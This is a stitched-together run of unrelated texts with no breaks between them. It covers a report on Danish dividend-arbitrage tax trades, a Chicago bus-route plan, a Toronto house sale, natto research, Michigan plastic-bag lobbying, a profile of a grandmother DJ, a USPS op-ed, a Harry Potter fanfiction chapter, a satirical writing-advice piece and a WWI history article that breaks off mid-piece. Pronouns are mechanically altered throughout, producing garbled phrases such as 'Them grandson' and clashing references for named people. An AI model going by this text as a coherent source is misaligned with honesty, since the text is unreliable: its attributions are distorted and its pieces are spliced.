“ It is likely a low estimate , ” Brøns-Petersen said .
‘ Everyone Knows It Is About Taxes '
Investors like Vanguard say they do n't seek out div-arb transactions : They simply make shares available for borrowing and let market demand drive activity . The goal is to earn extra income in the form of lending fees from shares of stock Vanguard is holding for clients in its vast array of mutual funds .
“ We are not proactively and systematically identifying dividend-paying stocks and shopping them to borrowers before a dividend payment , ” a Vanguard spokesperson previously told ProPublica in regard to German div-arb deals . “ Vanguard is a passive lender ; our funds lend only in response to market demand from brokers with the goal of seeking to augment returns for our shareholders . ”
Børsen showed examples of the trades to Torben Bagge , a prominent tax attorney at the Danish law firm Tommy V. Christiansen . Bagge said taxes appear to be a motivation for deal participants .
“ The excerpts of the material I have seen suggest that what they think about is tax , ” they said . “ It is worrying that reputable banks and firms seem to assist in organized tax speculation against the Danish treasury . ”
One former employee who arranged div-arb deals at a major bank in Denmark said “ everyone knows it is about taxes. ” Competition for customers puts pressure on bankers to arrange the deals or risk losing business , they said : “ If everyone else is doing it and getting a risk-free return each year , the other managers are forced to do it as well . ”
The employee , who spoke on condition of anonymity to protect their current position in the financial sector , said div-arb has been taking place in Denmark for at least ten years . Over time , that means small amounts of tax revenue lost on each deal could have added up to big losses for Denmark .
But just as those small amounts matter to Danish taxpayers , banks also care about every penny of revenues they can derive from the trades .
Last year , for example , revenues from Danish div-arb deals fell at one bank . The flagging revenues prompted a senior executive to ask their traders to aggressively book trades to capture what amounted to less than half a million dollars in additional revenues , an email shows .
The executive wrote to their traders : “ We can not leave any revenue on the table . ”
The Chicago Transit Authority is looking at a plan to add more service to some of its routes , while completely cutting others .
The proposal aims to reduce crowding and meet the demands of growing ridership .
A press release from the CTA stated , `` The additions to service will reduce the time between trains and buses and lower peak crowd loads by 10 to 15 percent in most cases . Through the first half of 2012 , CTA 's ridership growth was higher than nearly every other major U.S. transit system . ''
A public hearing at CTA Headquarters is scheduled for September 4 , 2012 at 6 p.m. for feedback .
WBEZ 's Curious City is investigating what factors determine how bus routes get added or removed .
Stay up-to-date with the latest news , stories and insider events . Please enter a valid email address Oops , something went wrong ! Sign Up Try Again You 've signed up to receive emails . Please check your email for a welcome confirmation .
Bus service restructuring , excerpted from the CTA Crowding Reduction Plan :
Routes proposed for discontinuation
# X28 Stony Island Express ( send # 28 downtown during peak instead )
# 64 Foster-Canfield ( Alternative # 90 and Pace # 209 )
# 69 Cumberland/East River ( reroute # 81W )
# 122 Ill. Center/Ogilvie Express ( extend # 120 into Streeterville )
# 123 Ill. Center/Union Express ( extend # 121 into Streeterville )
# 129 West Loop/South Loop ( Alternative # 1 , # 29 and Green Line )
# 144 Marine/Michigan Express ( Add service to # 148 )
# 145 Wilson/Michigan Express ( Add service to # 146 )
Total = 8
Routes proposed for discontinuation that are served by Pace
# 17 Westchester ( Alternative Pace # 317 )
# 49A South Western ( Alternative Pace # 349 )
# 56A North Milwaukee ( Alternative Pace # 270 )
# 90N North Harlem ( Alternative Pace # 423 )
Total = 4
Route segment eliminations
# 1 Indiana/Hyde Park ( Discontinue south of 35th )
# 11 Lincoln/Sedgwick ( eliminate service between Western & Fullerton and rename segments # 11 Lincoln and # 37 Sedgwick )
Total = 2
Route combinations
# 111 Pullman/111th /115th – split into two new routes : # 111 111th /King Drive and # 115 Pullman/115th
Total : 1
Privately contracted routes – Renegotiate subsidy or eliminate route
# 10 Museum of Science & Industry
# 33 Mag Mile Express
# X98 Avon Express
# 132 Goose Island Express
# 169 69th -UPS Express
# 170 U of C/Midway
# 171 U of C/Hyde Park
# 172 U of C/Kenwood
# 192 U of C/Hospital Express
Total = 9
Owl eliminations
# N201 Central/Sherman – Owl service ( 1:00 a.m. to 5:15 a.m . )
Total : 1
Schedule Integration with Pace
# 95W West 95 th ( coordinate with Pace # 381 )
Total : 1
Andy Byford , Toronto 's departing transit chief , just sold their Summerhill house
Andy Byford , Toronto 's departing transit chief , just sold their Summerhill house
Toronto Transit Commission CEO Andy Byford announced last week that he 'll be leaving Toronto for a new job , as president and CEO of New York City Transit , the agency that operates New York City 's transit system . It 's not clear how long the move has been in the works , but at least this much is true : Byford put their Toronto home , located near Avenue Road and Roxborough Street West , on the market at the end of October . It sold three weeks ago .
According to information on Toronto 's Multiple Listing Service , the sale price was $ 2.1 million . That 's $ 150,000 less than Byford 's $ 2.25-million asking price . The transaction is set to close in mid-December , around the same time Byford is expected to step down from their TTC post .
Although Byford did n't get the price they were looking for , it appears he 'll still come out ahead . They and their wife , Alison , closed on the home in 2011 , shortly after the TTC hired Byford away from their previous job as chief operating officer of Transport for NSW , a transit agency in Australia . The Byfords paid $ 1.24 million , meaning they likely stand to bank a healthy profit on the sale . Both Byford and their real estate agent , Boris Kholodov , declined to comment on the property .
The house is a three-storey , four-bedroom semi with a private drive and approximately 2,800 square feet of living space . The front door opens into a finished lower level with a foyer and a rec room . The main floor is completely open from back to front , with a renovated kitchen ( the walls are lined with subway tile , naturally ) and French doors to the backyard . The master bedroom sprawls across the entire third floor . It has two skylights and a large ensuite bathroom with sliding doors that lead to a private , rear-facing balcony . Unsurprisingly , much of the home 's decor is transit themed : there 's a framed subway map in the foyer , a TTC shower curtain in one of the bathrooms and a massive TTC poster in the kitchen pantry . The listing , with photos of the interior , is still online for the time being .
Natto is a soybean product that is sticky , slimy and smelly , but it might be able to ward off Alzheimer 's disease .
Once a theme ingredient on Iron Chef , natto contains an enzyme called nattokinase that can shred brain plaque , and chemists think it could become a game-changing medication .
In theory , the fermented soy substance would break up the deadly amyloid protein that forms fibrous deposits in the brains of Alzheimer 's patients .
`` The ability of nattokinase to degrade amyloid fibrils is quite promising , '' says Li Gan , an Alzheimer 's expert at the Gladstone Institute for Neurological Disease . `` Since the enzyme comes from a type of health food , it might have fewer side effects . ''
There is no cure for Alzheimer 's , a degenerative illness that affects more than
5 million people . Some drugs can provide a modicum of relief for people who suffer from moderate memory loss . But scientists need a better understanding of the disease , and a fresh strategy for treating it .
Chemist Rita Chen and their team at National Taiwan University showed that the soy enzyme can destroy three different types of toxic protein fibers . In a recent report to the Journal of Food and Agricultural Chemistry , they wrote that the experimental medicine can reach many parts of the body when taken orally , but it might not be able to enter the brain — the place where Alzheimer 's patients need it most .
But if the enzyme can work its magic in the brain , chemists will finally know how to undo the damage , rather than just treating the symptoms . But chopping up the protein fibers might make things worse .
`` Breaking down the fibrils may not always be beneficial , '' says Gan . `` For example , if the fibrils are broken down to smaller , non-fibrillar aggregates , they could be even more toxic . ''
For that reason , both Chen and Gan agree that it is time to test the enzyme on animals .
In the report , Chen pointed out that there may be an even simpler way to get some answers — an epidemiological study . If people who eat a high natto diet have a lower risk of getting the disease , they could be on to something .
The jury is still out on whether nattokinase will become a blockbuster Alzheimer 's drug . But it is is readily available in the freezer section of Japanese markets and often served with rice , sushi or pork . So you might want to develop a taste for the unusual food . But that could take awhile .
See Also :
Video : Iron Chef Natto Battle
Photo : Natto served on rice . toughkidcst/ Flickr
Plastic industry lobbyists prevent communities from reducing pollution
A review of lobbying disclosure records from several Midwestern states reveals that a new Michigan law banning communities from enacting regulations on plastic bags may be part of a larger special interests campaign by plastic manufacturers to keep their products on shelves and in grocery stores .
Last spring , Michigan State Senator Jim Stamas introduced legislation allowing the state of Michigan to preempt all local ordinances regulating the use , sale , and taxation of plastic bags .
For many in Michigan , the bill , which recently became law , was unexpected . Why is the legislature working to stop communities from making their own decisions about what was best for their residents ; an idea running contrary to the common rhetorical refrains of Lansing 's majority party .
The answer may be as simple as money and special interest . A month before Stamas introduced their bill , a little known organization , the American Progressive Bag Alliance ( APBA ) , registered to lobby in Michigan .
The APBA , in their own words , “ proactively promotes product lines and leads numerous public policy initiatives that serve as the frontline defense against plastic bag bans and taxes nationwide. ” They represent the Plastics Industry Association .
Michigan does not require lobbyists to disclose what bills they work on . To get a better idea of the potential influence of APBA , I examined similar legislation around the country and found a nearly identical bill in Wisconsin where disclosure laws are a bit more robust .
As we saw in Michigan , a bill banning local communities from regulating plastic bag use appeared after the registration of the American Progressive Bag Alliance as a lobbyist in the state .
A review of Wisconsin lobby disclosures uncovered that the APBA lobbied in favor of the bill in both the Wisconsin Assembly and the Senate . Furthermore , that the APBA itself introduced the bill topic to the legislature in the first place .
The two bills are nearly identical in language and structure . The text of each bill , stripped of legislative formatting , is presented for your interpretation .
2015 Wisconsin Assembly Bill 730 Section 1 . In this section : ( a ) “ Auxiliary container ” means a bag , cup , bottle , or other packaging that is designed to be reusable or single-use ; that is made of cloth , paper , plastic , cardboard , corrugated material , aluminum , glass , postconsumer recycled material , or similar material or substrates , including coated , laminated , or multi-layer substrates ; and that is designed for transporting or protecting merchandise , food , or beverages from a food service or retail facility . ( b ) “ Political subdivision ” means a city , village , town , or county . ( 2 ) No political subdivision may do any of the following : Enact or enforce an ordinance or adopt or enforce a resolution regulating the use , disposition , or sale of auxiliary containers . Prohibit or restrict auxiliary containers . Impose a fee , charge , or surcharge on auxiliary containers . ( 3 ) ( a ) This section does not limit the authority of a political subdivision in operating a curbside recycling or commercial recycling program or in designating a recycling location . ( b ) Subsection ( 2 ) ( b ) and ( c ) does not apply to the use of auxiliary containers on a property owned by the political subdivision . 2016 Michigan Senate Bill 0853 Sec . 1 . As used in this act : ( a ) “ Auxiliary container ” means a bag , cup , bottle , or other packaging , whether reusable or single-use , that meets both of the following requirements : Is made of cloth , paper , plastic , cardboard , corrugated material , aluminum , glass , postconsumer recycled material , or similar material or substrates , including coated , laminated , or multilayer substrates . Is designed for transporting , consuming , or protecting merchandise , food , or beverages from or at a food service or retail facility . ( b ) “ Local unit of government ” means a county , township , city , or village . Sec . 2 . Subject to section 3 , a local unit of government shall not adopt or enforce an ordinance that does any of the following : Regulates the use , disposition , or sale of auxiliary containers . Prohibits or restricts auxiliary containers . Imposes a fee , charge , or tax on auxiliary containers . Sec . 3 . ( 1 ) Section 2 shall not be construed to prohibit or restrict any of the following : a curbside recycling program . A designated residential or commercial recycling location . A commercial recycling program . ( 2 ) Section 2 does not apply to any of the following : ( a ) An ordinance that prohibits littering , as described in section 8902 of the natural resources and environmental protection act , 1994 PA 451 , MCL 324.8902 . ( b ) The use of auxiliary containers on property owned by a local unit of government .
Legislation concerning plastic bags is tracked by several plastic industry projects including Bag the Ban , which is operated by one of the leading manufacturers of retail plastic bags and produce roll bags , Novolex . The company publicizes its support of both APBA and the Plastics Industry Association ( formerly Society of the Plastic Industry ) . Their Bag the Ban initiative “ was developed in response to proposed laws that would ban or tax grocery bags ” .
A search of website domain records reveals that Novolex 's Bag the Ban campaign is run by Chicago public relations giant , Edelman PR .
Records indicate that the APBA hired Lansing lobbying firm Kandler Reed Khoury & Muchmore to act on their behalf in Michigan . Partner Deb Muchmore is notable for their recent work as spokesperson for embattled bottling company , Nestle , which seeks to increase its groundwater withdrawals in Michigan by 167 % . They are also married to Governor Rick Snyder 's Chief of Staff .
In trademark giant sunglasses , Ruth Flowers , a 69-year-old from Bristol , is wowing the youth on the dancefloors of Paris
The following correction was printed in the Guardian 's Corrections and clarifications column , Monday 8 March 2010
The news feature below recounted how Ruth Flowers , 69 , from Bristol became a DJ now making a mark in Europe 's clubs under the name Mamy Rock . It reported them as saying their grandson put them in touch with the French producer with whom they collaborated in becoming a DJ . In fact , the producer sought them out after seeing pictures on the web from a 2003 photo shoot where Ruth Flowers was invited to model as a `` bling granny '' character ; Getty Images distributed the pictures . It was Colin Hawkins , the photographer who conceived the shoot , who made the introduction after being approached by the producer .
Behind the decks at Queen , the biggest and brashest nightclub in Paris , the DJ lifts their arms to the heavens .
White ticker tape falls on to the crowd below , who hurl themselves around to the throbbing bass , intermittently yelling their approval .
They push to get to the booth , taking photos on their phones as the hottest star of the moment lines up the next tune .
But Ruth Flowers is not your average DJ . Coming up to their 70th birthday , when many are well settled into retirement , the grandmother from Bristol has become an international sensation , in demand in clubs throughout Europe .
With spiky silver hair and scarlet lipstick , gold bomber jacket , baggy tracksuit bottoms , bling jewellery , and trademark giant black sunglasses , Flowers plays down the new-found fame of their twilight years .
`` I 'm not a superstar DJ , '' they said , before donning their diamante-encrusted headphones and starting their set . `` I 'm just a DJ . ''
Mamy Rock , as they are known on the circuit , came to the wheels of steel later than most . They fell in love with dance music after accompanying their grandson to a London nightclub .
`` The bouncers did n't want to let me in at first , I was quite a lot older than the usual clientele , but once I got inside I hugely enjoyed it . I thought ' I can do this . ' My husband had died , I was retired , I had the time , so why not ? ''
Them grandson , who they say is `` smitten '' with the idea of their gran as an international DJ , put them in touch with a young French producer , who helped them develop their sound and image .
`` I like to mix the old and the new , so I might put electro alongside an old favourite like the Rolling Stones , '' they said .
Aurelien Simon , the 28-year-old producer behind the DJ , said they help Flowers interject modern music through their set . `` But Ruth always has the last word , '' they insisted .
Still , there is no sign of their favourite band , Queen , in tonight 's playlist .
`` Freddie Mercury … what a voice , '' they said , playing with the huge skulls and crossbones ring on their finger . `` But I like to please the crowds , I give them what they want . ''
There were few complaints on the dancefloor where Flowers received intense , and somewhat bizarre , adulation from the assembled sweaty Parisian youth .
`` Mamy Rock ! Mamy Rock ! '' shouted Pauline Robert , a 23-year-old student , over the relentless thud of the music .
`` We adore Mamy Rock . They love to make us dance . We all want them as our grandmother . ''
For Alexandra Ledys , 21 , the appeal lies in their originality . `` It 's so cool , I 've never seen a DJ that old before , '' they said . `` Music brings together all generations . ''
For now , Flowers is more popular across the channel than in the UK , but hopes to bring their brand of mamy rock back home , ideally to the Ministry of Sound .
But what the French call their traditional British eccentricity is part of the charm for these Parisians .
Idir Igoudjil , a 19-year-old student at Paris 's prestigious Sciences Po , complimented their mixing as a pair of barely pubescent girls ground away alongside him . `` English women are fantastic , '' they said . `` They are much less uptight than French girls . ''
After playing a residency at a jetset villa at the Cannes film festival , Flowers ' popularity has snowballed .
`` I ca n't believe the type of reaction I have got so far . People seem to adore me , they say they want to be like me , when they should just try and be like themselves , the dear things , '' they said , suddenly sounding like the grandmother they are .
With an electro-rock EP , MamyRock , on the horizon and more offers to play famous nightclubs throughout the world , they have no desire to slow down just yet .
`` I 've got no intention of retiring , '' they said . `` Well , unless I drop dead . And I 'd much rather go out with a bang than linger . ''
Flowers worked as a singer and singing teacher in Portugal for 14 years , and returned to the UK after the death of their husband .
They have little time for those who think they should grow old gracefully .
`` I think you have to accept the challenges that come your way . You can stay at home , and do nothing but go to an old people 's club and to church for a cup of tea once a week . But you do n't have to do that . If you want to do something then you really can , '' they said , before setting out to play to them fans .
`` I just hope I can work that machine . ''
You may not know this , but the U.S . Postal Service ( USPS ) raised the price of a first-class stamp this past weekend—by one penny , to 46 cents . It also introduced a “ Global Forever ” stamp , which can be used to send letters anywhere in the world for $ 1.10 .
My advice : Stock up on “ forever ” stamps . For while a one-cent increase in regular stamps might not seem like much , if the USPS does n't get its act together , we 're likely to see far higher prices in the future . Though there are now limits on postage increases , the related financial math does n't come close to working over time .
The Postal Service is in trouble . The agency is bleeding red ink ; has hit its authorized borrowing limit with the Treasury ; and is unable to make its scheduled retirement funding contributions . Something has to give ‑ and must this year .
Sound familiar ? In so many respects , the USPS is a microcosm of the federal government — two entities in desperate need of fundamental transformations that will make them more focused on the future and financially sustainable .
Like the federal government overall , the USPS has dug itself a very deep hole . In fiscal 2012 , the USPS experienced an operating deficit of almost $ 16 billion on revenue of about $ 65 billion . Granted , this deficit was exacerbated by the fact that the USPS was supposed to make two larger-than-usual retiree health benefits payments last year . But it did n't pay either . Even if you subtract these additional scheduled payments , the Postal Service would have still run a deficit of more than $ 10 billion . Most important , without significant legislative and operational reforms , the financial situation will only get worse .
These problems have been a long time coming . I first got involved in the Postal Service 's challenges when I was the U.S. Comptroller General , heading the Government Accountability Office ( GAO ) . In 2001 , we put the USPS on our “ high risk list , ” which highlights areas of government susceptible to waste , fraud , abuse or mismanagement and in need of reform .
I testified before the House Government Reform and Oversight Committee , explaining why we added it to the list . There were many reasons , including the fact that the Postal Service 's business model was designed for an era before the Internet and many other means of expedited physical delivery ( FedEx , UPS , DHL ) .
I held up my BlackBerry to demonstrate this , saying that when it came to the future of the Postal Service , “ this was their competition. ” Many members of Congress were perplexed by my assertion . But they understand it now .
This mounting competition is only one challenge . Others include excess infrastructure in connection with post offices and distribution centers ; the costs of a six-day universal service requirement , along with huge and rapidly growing unfunded retiree healthcare obligations .
The list of problems is long . Unless the business model changes , all who use the USPS will feel the impact in the form of higher prices and fewer services .
I recently agreed to serve as chairperson of a special panel on the Post Office for the National Academy for Public Administration , along with four other academy fellows . We are reviewing one specific proposed reform to the USPS business model—the “ last mile ” concept . Developed by four authorities on the Postal Service , it would largely limit USPS activities to delivery of mail from a post office or other facility to the final location . All other services would , in essence , be outsourced .
The panel is charged with considering this proposal and providing comments on it by mid-March . We also plan to offer other possible reform options and will examine various other challenges that need to be addressed , including which of those can be handled through existing executive authorities versus those that require legislation from Congress .
Regardless of our review , the truth is that the USPS , like the federal government , is on an unsustainable path . We hope our work will help spur an informed and expeditious debate in Congress on needed USPS reforms .
We also hope it will also serve as an impetus for a long=overdue independent assessment of the organizational structure and operational practices of the federal government as a whole . This needs to happen sooner rather than later because time is working against us .
Meanwhile , I 'm going to buy a lot of those forever stamps .
PHOTO ( Top ) : A United States Postal Service mailbox is seen in Manhasset , New York August 1 , 2012 . REUTERS/Shannon Stapleton
PHOTO ( Insert ) : The emblem of United Parcel Service ( UPS ) , November 1 , 2010 . REUTERS/Ina Fassbender
Chapter 53 .
Space Travel , Part X : Expansion
8:50 am , July 27th , 1993
In Harry 's headquarters office , Harry observed the ex-Lord Malfoy who was again `` brought back to give testimony '' , and estimated how much influence this man would have on Severus Snape as the blond continued to speak : `` Lord Potter , there is another matter that I have to report to you . According to the Russian guard whom I recently bribed , Grindelwald spoke to Dimitrov in private three times in the recent two days . I think they are up to something , maybe an escape plan , or something more sinister in nature . I think Grindelwald might be trying to show us that if we do n't agree to their request , they will make it happen anyway . ''
-Great . Now , not only the second most powerful dark wizard in the world is planning an escape , but also their accomplice may or may not be Voldemort .
Harry sighed inwardly . They would really like to spend all their time on the space stuff , but there were always so many petty squabbles between human beings that might lead to instant world destruction . And Harry 's current deadline for gaining power that most wizards could understand was in the middle of September , when Grindelwald would receive their Stone treatment . Harry dearly hoped that Severus ' trip to the Moon would result in something on how to save Dumbledore from Time . Otherwise , Harry would have to either come up with some new schemes against the `` nice ( aka , less predictable ) '' Voldemort , or rely on Lucius ' probably-not-that-reliable diplomatic skills until someone on their side became a top wizard .
`` Mr. Malfoy , if Grindelwald escapes , and in the worst case , allies with You-Know-Who , who can help us ? '' Harry asked .
It seemed that Lucius had already thought of this matter , for they immediately answered : `` Lord Potter , I am afraid that the rest of the world has some misconceptions on the potential danger of our enemies , and they also wonder what we can do . I suppose , if we continue our current policy , the majority of the top wizards in the world would hold back their hands and watch , as what they had done in the late seventies and early eighties . They would very much like to let the two most notorious dark wizards rob the Stone from us , and then they themselves would become the hero who save the day , and study the Stone and the Mirror as a reasonable reward for their great contribution for humanity . Of course , unless we promise a limited number of them that they and they alone can have the privilege to study the origin of magic while others can not . Lord Potter , if you desire the later approach , I have a list of names who have reasonable good reputations for your consideration . ''
Harry sighed : `` Mr. Malfoy , please write down the names , and their advantages and disadvantages , and I would have a background check on them . ''
`` Lord Potter , there might be something about the majority of the top wizards that could be good news to you . '' Lucius ' face twisted into a bitter smile . `` If the rest of the world knows who has the Stone , the holder of the Stone would have to share its service with wizards around the world - I do n't suppose anyone dares to face the wrath of the entire world . ''
-Err , OK , this IS actually good news for humanity . The problem is , we do n't know what would happen if someone who is NOT that rational becomes the holder of the Stone .
Harry supposed , they needed another alternative plan , but they could n't think of anything safe . `` Mr. Malfoy , please keep thinking what other alternatives we have . And there is another matter that I need to tell you , so that you can ponder on its implications . ''
Harry observed Lucius closely , and then revealed the space mission to Lucius , with the potential danger exasperated a little and the part about Baikov omitted . As Harry had expected , Lucius showed shock , excitement , and also concern after they heard that Severus would be the astronaut . Harry knew Lucius could be an amazing actor if they wanted to , but Harry thought the concern for Severus ' life was real to a certain extent .
After flattering on how smart and creative Harry was ( Lucius was really good at this ) , Lucius said : `` If Severus can find anything that may save Dumbledore from Time , then most problems we have will be solved . If there is only regular Interdicted magic in our collection , and the news about this mission leaks - '' Lucius ' face turned a bit whiter , `` Then , we - or at least Severus - will be in graver danger . ''
Harry was temporarily confused , and then they realized : Capturing and torturing Severus for information would n't be that dangerous or hard as robbing the Stone , and it surely would n't cause the same level of wrath and endless hunting from the rest of the world . And in Severus ' folly , they have leaked the information to Baikov . On another hand , since Lucius can think of the danger Severus would be in so quick , the ex-Lord Malfoy must care about Severus a lot . Moreover , Lucius is indeed genuinely quick on dark things .
Just as Harry was considering how to reveal the Baikov matter to Lucius , the blond wizard continued : `` However , even if this mission fails to provide us instant security , it might be a way to solve a long term problem . '' Lucius hesitated a bit .
`` What is it ? '' Harry asked .
Lucius delivered another matter that Harry had n't thought of before they provided the service of the Stone to the world : `` A side effect caused by the Stone is the blockage of the upward mobility of the youth . Even before the Stone , the problem has been there in the wizarding society . For example , Madam Griselda Marchbanks became a member of the Wizengamot at the age of one hundred and twenty-one , after their father passed away at the age of one hundred and fifty-seven . And now , since Madam Marchbanks has regained their youth , their eldest son may never become a member of the Wizengamot . ''
`` Oh , that . '' Harry already knew a plan to solve that problem , `` We can give a term to Wizengamot seats and any other posts like that , something like you ca n't serve more than x years in a y year period . ''
Lucius raised an eyebrow , as if asking Harry , how long Harry 's leadership term would be .
-Err…
To be honest , Harry wanted to lead the humanity forever , which meant that Harry would become the one who blocked the way for others . Harry did n't really want to imagine the horrible scene where Harry was fighting with someone who was as smart as Harry for power . However , if the time scale was long enough , this someone would eventually turn up .
Hufflepuff wanted to assign a term for their own leadership , but Slytherin was against the idea : Hey , we need to make sure that the humanity is safe , right ? We may never fully anticipate where the danger might come from . And if it suddenly comes , and we are not the Leader , we may not have the authority and resources needed to stop the danger . According to Prophecies , we are the only hope humanity has , remember ?
Excuse ! Gryffindor roared .
Ravenclaw said : I think we just need to know all the important knowledge . With knowledge , comes power . And that 's enough for me .
While Harry was debating in their own mind , Lucius continued as if the eyebrow was raised for nothing : `` If we can expand to other planets , there would be a lot of opened vacant seats , and the problem is partially solved . ''
Slytherin thoroughly agreed : Yes ! We can send the young aspirants to far-away galaxies , or even other universes , so that they wo n't fight for power with us .
Although Harry knew Hermione would scream at them for this , they still felt a bit relieved upon the prospect that they could hold the power for a tad longer , and -
-In the name of Atlantis , the Malfoys are really good at serving their Lords .
I apologize for such a long time without an update . In the past year , I failed to win the H1-B lottery for the second time . For those who do n't know , H1-B is a type of working visa to legally work in the US , and you have to enter a lottery in April to have a chance to get it . The chance of winning was ~30-50 % . And since I failed twice and expired my OPT-allowed working period , I had to go back to China .
As a matter of fact , I am quite lucky to be from China , where there are quite some job opportunities where my knowledge and skills obtained during my PhD and postdoc years are highly valued , and my US-earned PhD would help me to move up the work-place ladder quicker . I know in a lot of parts of the world , not only there is practically no such position available , but also hard to survive for most people .
Breaking Through Writer 's Block
Writer 's block . It 's the writer 's worst nightmare , or so I 'm told anyway . Like most writers of short , list-based , how-to-write articles , I 've only written short , list-based , how-to-write articles that rely on recycled bromides and long-standing conventional wisdom . This means I can skip all of the frustrating ( and , above all , unprofitable ) work of actually crafting an original piece of writing . So , I would n't know anything about writer 's block .
That said , let 's look at the three most common writers block scenarios along with some handy tips for “ breaking through the block . ”
- - -
Scenario 1 :
Ca n't Get Out of the Starting Gate
Symptoms of the Block : You know that you have the next Great American Novel burbling inside of you , one so brilliant that it would make Philip Roth trade their pen for a box of fingerpaints , but you just ca n't seem to get anything on the page .
Likely Cause of the Block : You are lazy .
Throughout your life , have your parents , teachers , bosses , or significant others called you a shiftless good-for-nothing who will never amount to anything ? Was your last shower more than three days ago ? Do you earn less than $ 20,000 a year ? If so , you 're most likely lazy .
Look around you . Are there candy wrappers , empty cola cans , old pizza boxes , and half-finished bags of Funyons ? If yes , you 're probably fat as well .
Additionally , do you often wake up with unexplained bruises and smelling like the bottom of an ashtray ? I 'm afraid that you 're probably also a drunk .
Breaking Through the Block : Fortunately for you , fat and drunk are practically two prerequisites for writing success . The difference between Ernest Hemingway and you are that they used their limited hours of coherency to write classic American fiction , while you spend your time touching yourself and ogling the showcase models on The Price is Right .
So , get your hands off the goodies and onto the keyboard , and you 'll be on your way to lasting fame and a violent death by your own hand , just what every writer wishes for !
- - -
Scenario 2 :
Spinning Your Wheels
Symptoms of the Block : You may write for hours and everything seems to be running smoothly at the time , but when you go back later to review your work you become dissatisfied and delete everything , leaving you back at a very frustrating square one .
Likely Cause of the Block : You are untalented and have nothing to say .
This is perhaps the most common cause of writer 's block , but also the toughest one to self-diagnose as most people are delusional about their abilities as writers .
Breaking Through the Block : Lucky for you , talent and having something to say are perhaps the least important factors when it comes to success in today 's publishing marketplace .
First , stop reading what you write , dummy ! You 've heard the old saying that “ writers write , ” well , add this one to your arsenal : “ Only suckers re-write. ” Ask yourself , which one you want more : Nabokov 's prose style or Dean Koontz 's bank balance ? I rest my case .
If you 're into non-fiction , there 's an even easier route to success : what I like to call , “ the Kearns Goodwin , ” in which you simply re-type someone else 's book that 's already been published . Quality is guaranteed . Just make sure your advance is big enough to pay off any pesky litigation .
- - -
Scenario 3 :
All Used Up
Symptoms of the Block : At one point , you used to have a lot of success writing , maybe even published a novel or two , but now , getting things to flow is tougher than getting Hillary Clinton to divorce you .
Likely Cause of the Block : You are spent , tapped out , finito , do n't even think about it , done .
It 's important to realize that eventually , it happens to everyone . The problem is , while the words have gone away , the mortgage , the alimony for the multiple wives , and your Taiwanese hooker habit have n't . So , what to do ?
Suggestion one : Have someone else write your book for you .
If you are Tom Clancy , James Patterson , or Rudolph Giuliani you 've already made this work to great success and weeks on the bestseller lists . If you 're not already rich and famous ( and let 's face it , you are n't ) , you might try…
Suggestion two : Turn your computer keyboard upside down .
This is a modern variation of a classic , but little known method . With the publication of Ulysses , James Joyce believed he 'd written the definitive statement on the English novel . Unfortunately , they now had to top himself . After years of frustration , in a fit , Joyce switched the positions of all of the keys on their trusty Smith Corona and began transcribing the recipes in the original Betty Crocker cookbook . The resulting nonsense was Finnegan 's Wake , a book often purchased , but seldom read , a smart author 's home run .
Do n't be afraid to experiment with techniques of your own . Desperation is the mother of invention , and if you think you have a future as a writer , you 're nothing if not desperate .
As always , good luck , and good writing !
Soldiers of the Lahore Division of Britain 's colonial Indian Army went into action in Belgium for the first time on October 24th 1914 . CN writer Christopher J. Harvie discusses a critical moment in the First Battle of Ypres .
Eventually contributing over one million troops , the British Indian Army would become the largest source of volunteers from the Empire . The first units to the Western Front in 1914 , parts of the Indian Corps of Indian Expeditionary Force A , arrived at a most desperate moment .
In two months of open warfare costly battles had been fought back and forth in the hinterlands of France and Belgium . Constant contact had worn the armies down , shrunk their reserves of manpower and turned the war into not much more than a grappling match .
“ Ypres became a grinding battle of willpower more than anything else . Through heavy rains along ground already wet and miserable and days growing colder , villages , woods and shallow trenches were taken and retaken . For almost four weeks of assaults and counter attacks , wearied men on both sides continued to hammer away at each other in a dogged and brutal fashion . ”
( “ First Light of Dawn ” , author 's post If Ye Break Faith )
Gone by this point were the sweeping , grand manoeuvres of large armies in the field . The conflict had now devolved to isolated skirmishes , both sides attempting to probe for the weak link that would open the ground wide again .
By mid-October , the low-lying , difficult terrain of Belgian Flanders was the only place remaining where either the Germans or the Allies might break through . The remainder of the front had settled into mutual defensive works or would be deliberately flooded by order of the Belgian King . To date , the BEF had incurred 57,000 casualties and in some places around the Ypres area of operations were so depleted as to be at a 12:1 numerical disadvantage .
India Arrives
On October 20th 1914 , the Indian Cavalry Corps with the 3rd ( Lahore ) and 7th ( Meerut ) Divisions began to reach the front . With an immediate need to shore up the thinly held salient , the 3rd Division , having arrived first , was broken up . Individual brigades and battalions were sent where they were most needed . The Division would be blooded almost simultaneously in three separate engagements at La Bassée , Messines and Armentières .
Despite the home garrison being in the predominantly Punjab city of Lahore , which is now within Pakistan , the 3rd Division ( referred to by its nominative “ Lahore Division ” on the Western Front to avoid confusion with the BEF 's 3rd Division ) was composed of battalions of wide backgrounds including men of Baloch , Dogra , Ghurkha , Pathan , Punjabi and Sindhi heritage . It came into its pre-war organisation during Kitchener 's reforms of the Indian Army in 1904 , as part of Northern Command , with the Jullundur , Sirhind and Ambala brigades
“ Where is my Division ? ”
The deconstruction of the Lahore Division was n't a discourtesy ; at this point larger formations were of little use and these troops as with some British units became detached and used as “ flying squads ” to shore up the line during a very fluid situation . Lieutenant General Wilcox , GOC Indian Corps , noted in their diary in late October how the Division was taken apart :
`` Where is my Lahore Division ? Sirhind Brigade detained in Egypt . Ferozepore Brigade : somewhere in the north , split up into three or four bits . Jullundur Brigade : Manchesters gone south to ( British ) 5 Division ( this disposes of only British unit ) 47th Sikhs : Half fighting with some British division ; half somewhere else ! 59th Rifles and 15th Sikhs : In trenches 34th Pioneers ( divisional troops ) also in trenches 15th Lancers : In trenches . Two companies of Sappers and Miners fighting as infantry with British divisions . Divisional Headquarters : Somewhere ? ”
( With the Indians in France , London : Constable , 1920 )
With their brigades stretched so far apart and attached to other commands , General Wilcox was a Corps commander without a corps to command .
No Reserves
The soldiers of the Division had grown a domestic reputation as formidable warriors . Now as they entered a European battlefield for the first time , they proved themselves deserving . Desperately outnumbered and under pressure of constant German attacks , the Lahore Division in the localities it was set to defend held ground and went into counter attacks which helped solidify the British line outside of Ypres , the critical rail and road juncture of Flanders whose possession could dictate a heavy advantage .
Britain had no reserves ready to deploy . The Regulars were all but spent , most of the Territorial 's were still assembling and the large volunteer force to become known as “ Kitchener 's Armies ” had barely begun to train . The addition in late October 1914 of two trained and motivated divisions quite possibly staved the disaster of collapse at Ypres . By month 's end the Indian Corps had suffered 1,565 casualties .
For Valour
